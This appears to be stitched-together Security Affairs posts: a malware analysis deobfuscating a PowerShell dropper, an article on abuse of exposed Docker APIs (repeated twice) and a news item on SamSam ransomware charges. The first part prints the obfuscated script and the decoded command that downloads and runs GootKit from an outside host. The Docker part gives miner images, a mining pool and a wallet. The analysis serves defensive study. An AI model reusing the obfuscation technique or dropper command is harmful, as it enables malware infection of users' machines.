${“@}${/.}${@}${/.} + ${“@}${/.}${@}${@} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${/.} + ${“@}${)@}${;}+${“@}${/.}${@}${#~=}+ ${“@}${#~=}${ *-}+${“@}${/.}${/.}${;} +${“@}${/.}${/.}${;} +${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${@}+${“@}${/.}${/.}${‘}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${#~=} + ${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${‘} +${“@}${/.}${/.}${;} + ${“@}${)@}${;}+ ${“@}${#~=}${#~=} + ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${#~=}+ ${“@}${)@}${ *-} + ${“@}${#~=}${#~=}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${/.}${@}+${“@}${/.}${@}${‘} + ${“@}${/.}${/.}${“[+} + ${“@}${)@}${ *-}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@} + ${“@}${/.}${/.}${;}+${“@}${/.}${@}${/.}+ ${“@}${/.}${/.}${)@}+${“@}${)@}${;} + ${“@}${/.}${/.}${*~}+ ${“@}${/.}${@}${)@} +${“@}${/.}${/.}${*~} + ${“@}${‘}${‘} +${“@}${$./}${*~}+${“@}${)@}${‘}+${“@}${;}${“[+}+ ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@}+ ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${@} +${“@}${$./}${*~} + ${“@}${$./}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} + ${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} +${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;} +${“@}${/.}${*~}${@}+ ${“@}${/.}${@}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${#~=}+ ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@} + ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${ *-}+${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=}+ ${“@}${)@}${;}+${“@}${/.}${@}${/.} +${“@}${/.}${*~}${@}+${“@}${/.}${@}${/.} + ${“@}${‘}${#~=}+ ${“@}${$./}${*~}+ ${“@}${“[+}${$./} + ${“@}${/.}${/.}${;}+${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} +${“@}${“[+}${@}+${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${/.}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${‘} +${“@}${$./}${*~} +${“@}${$./}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} +${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${@}${#~=} + ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+ ${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;}+${“@}${/.}${*~}${@}+${“@}${/.}${@}${;} +${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${ *-} +${“@}${/.}${@}${ *-} + ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${#~=}+${“@}${)@}${;} +${“@}${/.}${@}${/.} + ${“@}${/.}${*~}${@} + ${“@}${/.}${@}${/.} )”)

It seems a set of random special characters without any meaning. However, the Powershell interpreter can execute it quietly. So, after an accurate analysis, it is possible to see some pattern in the weird characters following the “$” symbol: in Powershell language is possible to declare variables using the pattern ${variable_name}, including any character between the braces, special characters doesn’t make exception. For  instance, some of variable names in the script above are:

  1. ${#/~}
  2. ${@}
  3. ${;}
  4. ${“@}
  5. ${#~=}
  6. ${/.}
  7. ${*~}

Replacing these variable names with some more readable and meaningful characters makes the script easier to analyze:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );
  2. .$var1 (“$var1 ($var12$var3$var2$var7 + $var12$var3$var2$var4 +$var12$var6$var2+ $var12$var5$var8+$var12$var3$var2$var6 +$var12$var3$var3$var3 +$var12$var3$var3$var7+ $var12$var3$var3$var8 +$var12$var6$var8+$var12$var3$var3$var10+$var12$var3$var2$var3+$var12$var3$var3$var6+$var12$var3$var3$var7+$var12$var3$var2$var7+$var12$var3$var3$var3+ $var12$var3$var3$var2+$var12$var6$var8+ $var12$var3$var2$var11 + $var12$var11$var9+ $var12$var3$var2$var8+ $var12$var3$var3$var3 +$var12$var3$var3$var6+ $var12$var5$var4+$var12$var6$var7+ $var12$var3$var2$var10 + $var12$var3$var3$var8+ $var12$var5$var4 +$var12$var7$var3 + $var12$var6$var3+ $var12$var3$var4$var5 + $var12$var9$var5+ $var12$var3$var2$var11+ $var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var3$var6+$var12$var3$var3$var8+ $var12$var6$var7+$var12$var9$var9+ $var12$var3$var3$var3+$var12$var3$var2$var2+ $var12$var3$var3$var9+$var12$var3$var2$var10 +$var12$var3$var2$var3+$var12$var5$var4 +$var12$var8$var8+$var12$var3$var2$var7+ $var12$var3$var3$var8+$var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6+ $var12$var11$var9 +$var12$var3$var3$var2+$var12$var3$var3$var7+ $var12$var3$var2$var4 + $var12$var3$var2$var3 +$var12$var3$var3$var6 + $var12$var3$var4$var7+$var12$var5$var4 +$var12$var10$var5 + $var12$var3$var3$var8 + $var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 + $var12$var8$var8 + $var12$var3$var2$var7+$var12$var3$var3$var8 + $var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6 +$var12$var11$var9 +$var12$var3$var3$var2+ $var12$var3$var3$var7+$var12$var3$var2$var4 +$var12$var3$var2$var3 + $var12$var3$var3$var6 + $var12$var5$var4+$var12$var6$var7+ $var12$var10$var5+ $var12$var3$var3$var3+ $var12$var3$var3$var9 + $var12$var3$var3$var6+ $var12$var11$var11+$var12$var3$var2$var3 + $var12$var5$var4+ $var12$var3$var2$var6+ $var12$var3$var3$var8+ $var12$var3$var3$var8 + $var12$var3$var3$var4 +$var12$var3$var3$var7+$var12$var7$var10+ $var12$var6$var9+$var12$var6$var9+$var12$var3$var3$var4 +$var12$var3$var3$var6 + $var12$var3$var2$var3 + $var12$var3$var2$var2 + $var12$var3$var2$var7+$var12$var3$var3$var7+ $var12$var3$var3$var4 +$var12$var3$var3$var3 + $var12$var3$var3$var7+ $var12$var3$var3$var8+ $var12$var3$var3$var3 + $var12$var6$var8+$var12$var3$var2$var11+ $var12$var11$var9+$var12$var3$var3$var8 +$var12$var3$var3$var8 +$var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var2$var2+$var12$var3$var3$var7+ $var12$var11$var11+ $var12$var3$var2$var6+ $var12$var3$var3$var11 + $var12$var3$var2$var3+ $var12$var3$var2$var7 +$var12$var3$var3$var8 + $var12$var6$var8+ $var12$var11$var11 + $var12$var3$var3$var3 + $var12$var3$var2$var11+ $var12$var6$var9 + $var12$var11$var11+ $var12$var3$var3$var3+$var12$var3$var2$var11 +$var12$var3$var3$var9+ $var12$var3$var3$var2+$var12$var3$var2$var7 + $var12$var3$var3$var10 + $var12$var6$var9+$var12$var3$var2$var7+ $var12$var3$var3$var2 + $var12$var3$var3$var8+$var12$var3$var2$var3+ $var12$var3$var3$var6+$var12$var6$var8 + $var12$var3$var3$var4+ $var12$var3$var2$var6 +$var12$var3$var3$var4 + $var12$var7$var7 +$var12$var5$var4+$var12$var6$var7+$var12$var8$var10+ $var12$var3$var2$var3 +$var12$var3$var3$var7 +$var12$var3$var3$var8+$var12$var3$var2$var7+ $var12$var3$var3$var2+ $var12$var11$var9+ $var12$var3$var3$var8+$var12$var3$var2$var7+$var12$var3$var3$var3 + $var12$var3$var3$var2 +$var12$var5$var4 + $var12$var5$var8 + $var12$var3$var2$var3 +$var12$var3$var3$var2+ $var12$var3$var3$var10 + $var12$var7$var10 + $var12$var3$var3$var8 +$var12$var3$var2$var3+ $var12$var3$var2$var11+ $var12$var3$var3$var4 + $var12$var11$var4+$var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8 +$var12$var3$var4$var2+ $var12$var3$var2$var8 +$var12$var3$var2$var3+$var12$var3$var3$var11+ $var12$var3$var3$var9+ $var12$var3$var2$var6 + $var12$var3$var3$var9+ $var12$var3$var2$var9+$var12$var3$var2$var3 +$var12$var3$var3$var11+ $var12$var6$var8+$var12$var3$var2$var3 +$var12$var3$var4$var2+$var12$var3$var2$var3 + $var12$var7$var11+ $var12$var5$var4+ $var12$var10$var5 + $var12$var3$var3$var8+$var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 +$var12$var10$var2+$var12$var3$var3$var6 +$var12$var3$var3$var3+ $var12$var11$var11+ $var12$var3$var2$var3 + $var12$var3$var3$var7 +$var12$var3$var3$var7 +$var12$var5$var4 +$var12$var5$var8 +$var12$var3$var2$var3+$var12$var3$var3$var2+ $var12$var3$var3$var10 +$var12$var7$var10 + $var12$var3$var3$var8 + $var12$var3$var2$var3 +$var12$var3$var2$var11 + $var12$var3$var3$var4 + $var12$var11$var4+ $var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8+$var12$var3$var4$var2+$var12$var3$var2$var8 +$var12$var3$var2$var3 +$var12$var3$var3$var11 +$var12$var3$var3$var9+ $var12$var3$var2$var6+ $var12$var3$var3$var9 +$var12$var3$var2$var9 + $var12$var3$var2$var3 + $var12$var3$var3$var11+$var12$var6$var8 +$var12$var3$var2$var3 + $var12$var3$var4$var2 + $var12$var3$var2$var3 )”)

The first instruction of the script sets the variable values to some fixed strings, derived from a series of wasteful concatenation operations:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );

After the execution of this instruction, the values contained into the variables are:

  1. $var1 = “iex”
  2. $var2 = “0
  3. $var3 = “1
  4. $var4 = “2
  5. $var5 = “3
  6. $var6 = “4
  7. $var7 = “5
  8. $var8 = “6
  9. $var9 = “7
  10. $var10 = “8
  11. $var11 = “9
  12. $var12 = “[CHar]

The second piece of code concatenates the above values in order to compose a powershell command string. Each single character of the generated command is represented as ASCII decimal numbers leveraging the variables above as alphabet (i.e. “$var12$var3$var2$var7” becomes “[CHar]105”) . The decoding of the entire instruction results in:

  1. iex ([CHar]105 + [CHar]102 +[CHar]40+ [CHar]36+[CHar]104 +[CHar]111 +[CHar]115+ [CHar]116 +[CHar]46+[CHar]118+[CHar]101+[CHar]114+[CHar]115+[CHar]105+[CHar]111+ [CHar]110+[CHar]46+ [CHar]109 + [CHar]97+ [CHar]106+ [CHar]111 +[CHar]114+ [CHar]32+[CHar]45+ [CHar]108 + [CHar]116+ [CHar]32 +[CHar]51 + [CHar]41+ [CHar]123 + [CHar]73+ [CHar]109+ [CHar]112+ [CHar]111 + [CHar]114+[CHar]116+ [CHar]45+[CHar]77+ [CHar]111+[CHar]100+ [CHar]117+[CHar]108 +[CHar]101+[CHar]32 +[CHar]66+[CHar]105+ [CHar]116+[CHar]115+[CHar]84 +[CHar]114+ [CHar]97 +[CHar]110+[CHar]115+ [CHar]102 + [CHar]101 +[CHar]114 + [CHar]125+[CHar]32 +[CHar]83 + [CHar]116 + [CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 + [CHar]66 + [CHar]105+[CHar]116 + [CHar]115+[CHar]84 +[CHar]114 +[CHar]97 +[CHar]110+ [CHar]115+[CHar]102 +[CHar]101 + [CHar]114 + [CHar]32+[CHar]45+ [CHar]83+ [CHar]111+ [CHar]117 + [CHar]114+ [CHar]99+[CHar]101 + [CHar]32+ [CHar]104+ [CHar]116+ [CHar]116 + [CHar]112 +[CHar]115+[CHar]58+ [CHar]47+[CHar]47+[CHar]112 +[CHar]114 + [CHar]101 + [CHar]100 + [CHar]105+[CHar]115+ [CHar]112 +[CHar]111 + [CHar]115+ [CHar]116+ [CHar]111 + [CHar]46+[CHar]109+ [CHar]97+[CHar]116 +[CHar]116 +[CHar]112+ [CHar]111 + [CHar]100+[CHar]115+ [CHar]99+ [CHar]104+ [CHar]119 + [CHar]101+ [CHar]105 +[CHar]116 + [CHar]46+ [CHar]99 + [CHar]111 + [CHar]109+ [CHar]47 + [CHar]99+ [CHar]111+[CHar]109 +[CHar]117+ [CHar]110+[CHar]105 + [CHar]118 + [CHar]47+[CHar]105+ [CHar]110 + [CHar]116+[CHar]101+ [CHar]114+[CHar]46 + [CHar]112+ [CHar]104 +[CHar]112 + [CHar]55 +[CHar]32+[CHar]45+[CHar]68+ [CHar]101 +[CHar]115 +[CHar]116+[CHar]105+ [CHar]110+ [CHar]97+ [CHar]116+[CHar]105+[CHar]111 + [CHar]110 +[CHar]32 + [CHar]36 + [CHar]101 +[CHar]110+ [CHar]118 + [CHar]58 + [CHar]116 +[CHar]101+ [CHar]109+ [CHar]112 + [CHar]92+[CHar]107+ [CHar]115 + [CHar]106 +[CHar]120+ [CHar]106 +[CHar]101+[CHar]119+ [CHar]117+ [CHar]104 + [CHar]117+ [CHar]107+[CHar]101 +[CHar]119+ [CHar]46+[CHar]101 +[CHar]120+[CHar]101 + [CHar]59+ [CHar]32+ [CHar]83 + [CHar]116+[CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 +[CHar]80+[CHar]114 +[CHar]111+ [CHar]99+ [CHar]101 + [CHar]115 +[CHar]115 +[CHar]32 +[CHar]36 +[CHar]101+[CHar]110+ [CHar]118 +[CHar]58 + [CHar]116 + [CHar]101 +[CHar]109 + [CHar]112 + [CHar]92+ [CHar]107+ [CHar]115 + [CHar]106+[CHar]120+[CHar]106 +[CHar]101 +[CHar]119 +[CHar]117+ [CHar]104+ [CHar]117 +[CHar]107 + [CHar]101 + [CHar]119+[CHar]46 +[CHar]101 + [CHar]120 + [CHar]101 )

At this point, a simple ASCII to char conversion make possible to decode and recover the final powershell command, unveiling the code purpose. It imports the BitsTransfer cmdlet (Background Intelligent Transfer Service) and proceeds to download and execute the GootKit malware.

  1. if($host.version.major -lt 3){
  2. Import-Module BitsTransfer
  3. }
  4. Start-BitsTransfer -Source https://predisposto.mattpodschweit.com/comuniv/inter.php7 -Destination $env:temp\ksjxjewuhukew.exe;
  5. Start-Process $env:temp\ksjxjewuhukew.exe

 

Conclusion

The initial script, at a first impression, seems obfuscated using some sophisticated techniques. However, analyzing its actual code shows how the clever usage of simple tricks such as variable replacement or decimal encoding, is able to hide a clearly malicious Powershell script, making it nearly undetectable by common anti-malware engines.

This analysis and many others are available on the official blog of the Yoroi cyber security firm.

Dissecting the Mindscrew-Powershell Obfuscation

Pierluigi Paganini

(Security Affairs – Powershell , VBScript)

The post Dissecting the Mindscrew-Powershell Obfuscation appeared first on Security Affairs.

Security Affairs: Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers

Exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community.

Preface

IT industry has seen quite a few transformations in last couple of decades with advent of disruptive technologies. Back in 2000, every aspiring student wanted to become computer /IT engineer, thanks to “.com” boom that was storming the IT industry back in those days.  After a few years, IT industry disrupted big time again with the dawn of Virtualization.

Inception of Cloud technologies, in last few years, has completely changed the way we perceive and manage IT. Who would have thought 20 years back that all of the IT Infrastructure could be generated by just a few lines of code?

Recently, with the rise of DevOps, backed by these latest disruptive advancements, the IT industry once again getting redefined its way of working. Today, every organization in the industry is keen to embrace this Digital Transformation journey to leverage the benefits provided by DevOps by adopting it. DevOps practices are offering enormous capability of rapidly delivering products by reforming and automating the CI/CD pipeline. The DevOps practices make deployment way efficient and standardized by providing speed, consistency and scalability. The field of IT is again going through a big transformation and we all are a part of this journey. At the same time, the cyber security industry is also moving very quickly to keep pace with the technology disruptions. The ways & means of delivering effective cyber security have gone through radical changes in last 6 -7 years to ensure security in this dynamic environment. Meanwhile, the rise of DevOps has given a birth to DevSecOps to ensure security in CI/CD pipeline.

The use of containers has become prevalent with a rise of DevOps era. Containers are dynamic & ephemeral by nature. Anything which is ephemeral is hard to get visibility on and if it is not visible then it is hard to secure. Traditional security measures may or may not work effectively to secure such a dynamic infrastructure. There are several challenges related to container security; and there are commercial and opensource solutions in the market to handle these newborn challenges.

In this article, I am exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community. Docker has both community and enterprise editions. Docker comes with quite a few security features with it, however, misconfiguration by admins/users of the Dockers may leave them vulnerable and open to exploit.

Need of an API

By default, when the Docker is installed, API is not exposed to the outside world. It is only accessible through loopback interface of the container. Exposing API may be required to leverage the application like Portainer which is used to manage containers on that host or on the remote hosts.

How to open API in Docker for CentOS?

Opening of API may get slightly tricky based on the operating system that you are using. Please follow the following steps to open an API on CentOS 7, provided that the Docker engine is already installed.

Update the file:  /etc/systemd/system/docker.service.d/docker.conf with the following commands

[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

Note: If directory or file is missing under /etc/systemd/system then create it manually.

Docker

Restart the docker service using systemd commands:

sudo systemctl daemon-reload
sudo systemctl restart docker

You can verify if the configuration is working as expected by calling

Ps –ef | grep docker

Docker

How to connect to open API?

Following Docker command is used to hook in to open API on the remote host. Just by nudging the API with a standard curl command you will get following information (see the screenshot).

Curl –s <remote_ip>:2375/2376 | jq

Docker

What can(not) we do with Open API?

Once we get the open API on a remote docker_host, all the docker commands can be run on the remote hosts.  Using Docker commands, all sorts of docker operations & management can be performed on the remote host for Dockers –  ranging from Information gathering about Docker host to pulling the cryptominer image and running it as a rogue container on the remote host.

I have created a demo set-up to demonstrate a few of these examples

I have expose API on one of the CentOS boxes –  10.113.12.119 – as per the steps mentioned in the above section. I will connect to this machine using this Open API on port 2375 (Docker).

Information Gathering

Docker

List the images stored on the machine

Docker

List all containers on the machineDocker

Run/Launch the container on the remote machine / Spwaning a shell via exec command

Docker

List running containers on the machine

Docker

Run any command with root privilege on any of the running containers

Docker

Pull any image from the public repository and run that as a container on the remote hostDocker

Docker

Open Docker API on the Internet

If you explore Shodan search engine for Open API then you find that more than 1000 hosts are having their Docker API exposed on the Internet.

Docker

I have pulled down sample approx. 500 hosts using Shodan API and done some analytics on these 500 hosts to know the spread pattern of these open APIs.

Docker

By looking at the chart above, we can say that, China & United States shares the large number of open Docker APIs.

The largest share of the Docker Engines in analyzed ~500 open APIs are: 18.06.1-ce.

Docker

Even if where SSL/TLS is enabled, a small portion of Docker APIs were supporting vulnerable and outdated

protocols like SSLv2, SSLv3

Are they already compromised?

Out of ~500 samples analyzed, 130+ are already compromised with the cryptominer. It has been observed that 130+ hosts are compromised and running with cryptominer containers at the time of this research.  A few of the hosts are running with multiple mining containers; moreover, the containers are dynamic in nature hence the data varies a bit everytime we scan the open APIs. However, it is consistently giving 140+ miner containers running during the scan of these ~500 vulnerable hosts.

Most of these hosts are compromised with popular monero cpu cryptominer. These rogue containers will eat up CPU cycles on the hosts where it is installed. Docker has made it too easy to start mining with the help of miner images uploaded on the Docker Image Repository – Hub.

Just need to pull down one of those images and run/start the container on the remote hosts.

Out of ~140 observed compromised hosts, ~110+ are running with the “kannix/monero-miner” image.

Docker

If you look at the image statistics on Docker image repository, this image is pulled over 10M times. This shows the popularity of this miner image.

There are other cryptominer images also used but in very small portion.

arayan/monero-miner

Docker

timonmat/xmr-stak-cpu

Docker

strm/xmrig

Docker

bitnn/alpine-xmrig

Docker

Kannix/monero-miner run with following arguments for all analyzed samples –

  • Algorithm – cryptonight-lite
  • Pool Used – pool.aeon.hashvault.pro:3333
  • User (wallet account) –WmthxKa4FVvSDA8fjyXiZJB3WWWFxumQJAZfRGmrMCaMCooq52sipimAYJM2NYNy34bJUX566wEBmEC2QmdmnVLh2GzgRy4F6
  • Password – phantompain
  • Donate-level – 1
  • Max-cpu-usage – 100

How to prevent such attacks?

To prevent such attacks, we need to secure DockerAPI, TLS needs to be enabled by specifying tlsverify flag and pointing dokcer’s tlscacert to a trusted CA certificate.

There is step-by-step process explained how to secure API is described in Security documentation. Please refer Protect the Docker daemon socket.

About the author: Kirtar Oza CISSP,CISA, MS

Edited by Pierluigi Paganini

(Security Affairs – cybersecurity, Hacking)

The post Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers appeared first on Security Affairs.



Security Affairs

Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers

Exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community.

Preface

IT industry has seen quite a few transformations in last couple of decades with advent of disruptive technologies. Back in 2000, every aspiring student wanted to become computer /IT engineer, thanks to “.com” boom that was storming the IT industry back in those days.  After a few years, IT industry disrupted big time again with the dawn of Virtualization.

Inception of Cloud technologies, in last few years, has completely changed the way we perceive and manage IT. Who would have thought 20 years back that all of the IT Infrastructure could be generated by just a few lines of code?

Recently, with the rise of DevOps, backed by these latest disruptive advancements, the IT industry once again getting redefined its way of working. Today, every organization in the industry is keen to embrace this Digital Transformation journey to leverage the benefits provided by DevOps by adopting it. DevOps practices are offering enormous capability of rapidly delivering products by reforming and automating the CI/CD pipeline. The DevOps practices make deployment way efficient and standardized by providing speed, consistency and scalability. The field of IT is again going through a big transformation and we all are a part of this journey. At the same time, the cyber security industry is also moving very quickly to keep pace with the technology disruptions. The ways & means of delivering effective cyber security have gone through radical changes in last 6 -7 years to ensure security in this dynamic environment. Meanwhile, the rise of DevOps has given a birth to DevSecOps to ensure security in CI/CD pipeline.

The use of containers has become prevalent with a rise of DevOps era. Containers are dynamic & ephemeral by nature. Anything which is ephemeral is hard to get visibility on and if it is not visible then it is hard to secure. Traditional security measures may or may not work effectively to secure such a dynamic infrastructure. There are several challenges related to container security; and there are commercial and opensource solutions in the market to handle these newborn challenges.

In this article, I am exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community. Docker has both community and enterprise editions. Docker comes with quite a few security features with it, however, misconfiguration by admins/users of the Dockers may leave them vulnerable and open to exploit.

Need of an API

By default, when the Docker is installed, API is not exposed to the outside world. It is only accessible through loopback interface of the container. Exposing API may be required to leverage the application like Portainer which is used to manage containers on that host or on the remote hosts.

How to open API in Docker for CentOS?

Opening of API may get slightly tricky based on the operating system that you are using. Please follow the following steps to open an API on CentOS 7, provided that the Docker engine is already installed.

Update the file:  /etc/systemd/system/docker.service.d/docker.conf with the following commands

[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

Note: If directory or file is missing under /etc/systemd/system then create it manually.

Docker

Restart the docker service using systemd commands:

sudo systemctl daemon-reload
sudo systemctl restart docker

You can verify if the configuration is working as expected by calling

Ps –ef | grep docker

Docker

How to connect to open API?

Following Docker command is used to hook in to open API on the remote host. Just by nudging the API with a standard curl command you will get following information (see the screenshot).

Curl –s <remote_ip>:2375/2376 | jq

Docker

What can(not) we do with Open API?

Once we get the open API on a remote docker_host, all the docker commands can be run on the remote hosts.  Using Docker commands, all sorts of docker operations & management can be performed on the remote host for Dockers –  ranging from Information gathering about Docker host to pulling the cryptominer image and running it as a rogue container on the remote host.

I have created a demo set-up to demonstrate a few of these examples

I have expose API on one of the CentOS boxes –  10.113.12.119 – as per the steps mentioned in the above section. I will connect to this machine using this Open API on port 2375 (Docker).

Information Gathering

Docker

List the images stored on the machine

Docker

List all containers on the machineDocker

Run/Launch the container on the remote machine / Spwaning a shell via exec command

Docker

List running containers on the machine

Docker

Run any command with root privilege on any of the running containers

Docker

Pull any image from the public repository and run that as a container on the remote hostDocker

Docker

Open Docker API on the Internet

If you explore Shodan search engine for Open API then you find that more than 1000 hosts are having their Docker API exposed on the Internet.

Docker

I have pulled down sample approx. 500 hosts using Shodan API and done some analytics on these 500 hosts to know the spread pattern of these open APIs.

Docker

By looking at the chart above, we can say that, China & United States shares the large number of open Docker APIs.

The largest share of the Docker Engines in analyzed ~500 open APIs are: 18.06.1-ce.

Docker

Even if where SSL/TLS is enabled, a small portion of Docker APIs were supporting vulnerable and outdated

protocols like SSLv2, SSLv3

Are they already compromised?

Out of ~500 samples analyzed, 130+ are already compromised with the cryptominer. It has been observed that 130+ hosts are compromised and running with cryptominer containers at the time of this research.  A few of the hosts are running with multiple mining containers; moreover, the containers are dynamic in nature hence the data varies a bit everytime we scan the open APIs. However, it is consistently giving 140+ miner containers running during the scan of these ~500 vulnerable hosts.

Most of these hosts are compromised with popular monero cpu cryptominer. These rogue containers will eat up CPU cycles on the hosts where it is installed. Docker has made it too easy to start mining with the help of miner images uploaded on the Docker Image Repository – Hub.

Just need to pull down one of those images and run/start the container on the remote hosts.

Out of ~140 observed compromised hosts, ~110+ are running with the “kannix/monero-miner” image.

Docker

If you look at the image statistics on Docker image repository, this image is pulled over 10M times. This shows the popularity of this miner image.

There are other cryptominer images also used but in very small portion.

arayan/monero-miner

Docker

timonmat/xmr-stak-cpu

Docker

strm/xmrig

Docker

bitnn/alpine-xmrig

Docker

Kannix/monero-miner run with following arguments for all analyzed samples –

  • Algorithm – cryptonight-lite
  • Pool Used – pool.aeon.hashvault.pro:3333
  • User (wallet account) –WmthxKa4FVvSDA8fjyXiZJB3WWWFxumQJAZfRGmrMCaMCooq52sipimAYJM2NYNy34bJUX566wEBmEC2QmdmnVLh2GzgRy4F6
  • Password – phantompain
  • Donate-level – 1
  • Max-cpu-usage – 100

How to prevent such attacks?

To prevent such attacks, we need to secure DockerAPI, TLS needs to be enabled by specifying tlsverify flag and pointing dokcer’s tlscacert to a trusted CA certificate.

There is step-by-step process explained how to secure API is described in Security documentation. Please refer Protect the Docker daemon socket.

About the author: Kirtar Oza CISSP,CISA, MS

Edited by Pierluigi Paganini

(Security Affairs – cybersecurity, Hacking)

The post Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers appeared first on Security Affairs.

U.S. DoJ charges Iranian duo over SamSam Ransomware activity

The U.S. DoJ charges two Iranian men over their alleged role in creating and spreading the infamous SamSam ransomware.

Two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27) have been charged by DoJ for their role in creating and distributing the dreaded SamSam ransomware.

The duo faces six hacking and extortion-related charges, including conspiracy to commit wire fraud, intentional damage to a protected computer, conspiracy to commit fraud and related activity in connection with computers,  and transmitting a demand in relation to damaging a protected computer.

The two Iranians are accused to have developed the SamSam ransomware in December 2015 and have continuously improved it.

“Extorted the Victims for ransom payments in exchange for the decryption keys to unlock the compromised computers.” reads the DoJ indictment. 

“The defendants hacked, encrypted, and extorted more than 200 Victims, and collected more than $6 million in ransom payments. The Victims incurred additional losses exceeding $30 million resulting from the loss of access to their data.”

The hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, they have caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by ransomware, the cyber attack was confirmed by the City officials.

The ransomware infection has caused the interruption of several city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the port of San Diego in September,  the incident impacted the processing park permits and record requests, along with other operations.

